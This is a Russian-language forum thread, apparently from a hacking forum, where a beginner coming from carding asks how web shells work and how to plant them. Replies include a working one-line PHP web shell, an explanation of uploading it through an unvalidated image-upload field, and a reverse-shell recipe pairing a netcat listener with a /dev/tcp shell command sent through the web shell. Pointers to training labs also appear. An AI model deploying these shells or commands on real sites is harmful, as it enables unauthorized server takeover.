• XSS.stack #1 – первый литературный журнал от юзеров форума

О том, что такое web shell

kosh_e4ka

(L2) cache
Пользователь
Регистрация
29.10.2022
Сообщения
398
Реакции
146
С лета начал изучать тему пентеста, перекатываюсь сюда из каржа. Есть небольшие успехи в скулях, но очень хочется понять что такое web shell, как его заливать, как искать эту уязвимость, как вообще устанавливается сниффер? Как это работает? Может быть кто то сможет подсказать статьи по этой теме? Всем заранее спасибо
 
обычно веб шелл это php скрипт который позволяет выполнять linux команды для сервера на котором он стоит
например:
<?php

echo shell_exec($_GET['command']);

?>

чтоб скрипт отработал ты в браузере пишешь example.com/myWebShellScript.php?command=ls (ls = команда linux чтоб получить список файлов в директории чисто для примера)
и скрипт выполнит команду и выведет список всех файлов в директории, вместо ls можно писать любую команду

задача кул хацкера залить такой веб шелл на сайт чтоб выполнять любые команды POST GET запросами

https://github.com/flozz/p0wny-shell - можешь прям у себя на компе запустить выглядит командная строка, только сайт
 
обычно веб шелл это php скрипт который позволяет выполнять linux команды для сервера на котором он стоит
например:
<?php

echo shell_exec($_GET['command']);

?>

чтоб скрипт отработал ты в браузере пишешь example.com/myWebShellScript.php?command=ls (ls = команда linux чтоб получить список файлов в директории чисто для примера)
и скрипт выполнит команду и выведет список всех файлов в директории, вместо ls можно писать любую команду

задача кул хацкера залить такой веб шелл на сайт чтоб выполнять любые команды POST GET запросами

https://github.com/flozz/p0wny-shell - можешь прям у себя на компе запустить выглядит командная строка, только сайт
Спасибо большое, пролил свет. А как вообще понять что есть возможность загрузить шелл на сайт?
 
Спасибо большое, пролил свет. А как вообще понять что есть возможность загрузить шелл на сайт?
Смотри, шел как правило это файл с раширением php и тебе нужно его загрузить на сервер....
подумай при каких сценариях на таргете, он что-то сохраняет себе в файловую систему....аву можно прикрепить?(банально для примера), если аву прилепишь, он ведь будет хранить её у себя где то в файлах и показывать её.... вообще почитай или посмотри что-нибудь начальное, чтобы вообще понимать базу
 
Generally speaking:
Web shell is the code that you upload most often through the upload file functionality; it can be any programming language and any functionality (file, picture, etc.)
In addition to loading problems, there is a second problem - getting the server to execute this code and return the result to you. Most often it looks like accessing the file you accessed
To get started, I can recommend any labs, for example at portswigger, htb or thm
 
Спасибо большое, пролил свет. А как вообще понять что есть возможность загрузить шелл на сайт?
один из банальных примеров, на сайте есть <input type="file"> куда юзер должен загрузить картинку, но вместо картинки юзер загружает .php файл(шелл), из-за того что кодеры не поставили валидацию на загружаемый файл то пхп шелл удачно попадает в директорию сайта например example.com/images/myshell.php откуда им и можно пользоваться, то есть должна была загрузиться картинка а грузиться наш "вредонос"
 
обычно веб шелл это php скрипт который позволяет выполнять linux команды для сервера на котором он стоит
например:
<?php

echo shell_exec($_GET['command']);

?>

чтоб скрипт отработал ты в браузере пишешь example.com/myWebShellScript.php?command=ls (ls = команда linux чтоб получить список файлов в директории чисто для примера)
и скрипт выполнит команду и выведет список всех файлов в директории, вместо ls можно писать любую команду

задача кул хацкера залить такой веб шелл на сайт чтоб выполнять любые команды POST GET запросами

https://github.com/flozz/p0wny-shell - можешь прям у себя на компе запустить выглядит командная строка, только сайт
я правильно понял, что для того чтобы иметь доступ к reverse shell, мне надо вот эту команду sh -i >& /dev/tcp/10.10.10.10/9001 0>&1 где вместо 10.10.10.10 будет ip машины с которой я подключаюсь, в виде файла .php залить на интересующий меня сайт?
 
я правильно понял, что для того чтобы иметь доступ к reverse shell, мне надо вот эту команду sh -i >& /dev/tcp/10.10.10.10/9001 0>&1 где вместо 10.10.10.10 будет ip машины с которой я подключаюсь, в виде файла .php залить на интересующий меня сайт?
You misunderstand the difference between web shell and reverse shell.
Web shell - something that you interact from the browser. For example you uploaded php shell via file upload and execute your command like /shell.php?cmd=whoami
Reverse shell - shell from the target connects to attacker machine. For example on your attacker machine you run: nc -lvnp 9001 <- basically you set up listener
And on target machine you execute reverse connection. For example how to get reverse shell from web shell: /shell.php?cmd=sh -i >& /dev/tcp/ip/port 0>&1
In this example payload should be url encoded of course
 
You misunderstand the difference between web shell and reverse shell.
Web shell - something that you interact from the browser. For example you uploaded php shell via file upload and execute your command like /shell.php?cmd=whoami
Reverse shell - shell from the target connects to attacker machine. For example on your attacker machine you run: nc -lvnp 9001 <- basically you set up listener
And on target machine you execute reverse connection. For example how to get reverse shell from web shell: /shell.php?cmd=sh -i >& /dev/tcp/ip/port 0>&1
In this example payload should be url encoded of course
Where I can get more info about all hacking things from the scratch?
What to start lerning first? Also which IT languate if it needed ?
 
Where I can get more info about all hacking things from the scratch?
What to start lerning first? Also which IT languate if it needed ?
start from tryhackme. After you will finish some learning paths there you will learn more and will ask more specific questions
 
Пожалуйста, обратите внимание, что пользователь заблокирован
На вот тебе мат развлекайся >_<

https://pentesterlab.com/exercises/php_include_and_post_exploitation/course (Начни с этого)

todo
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх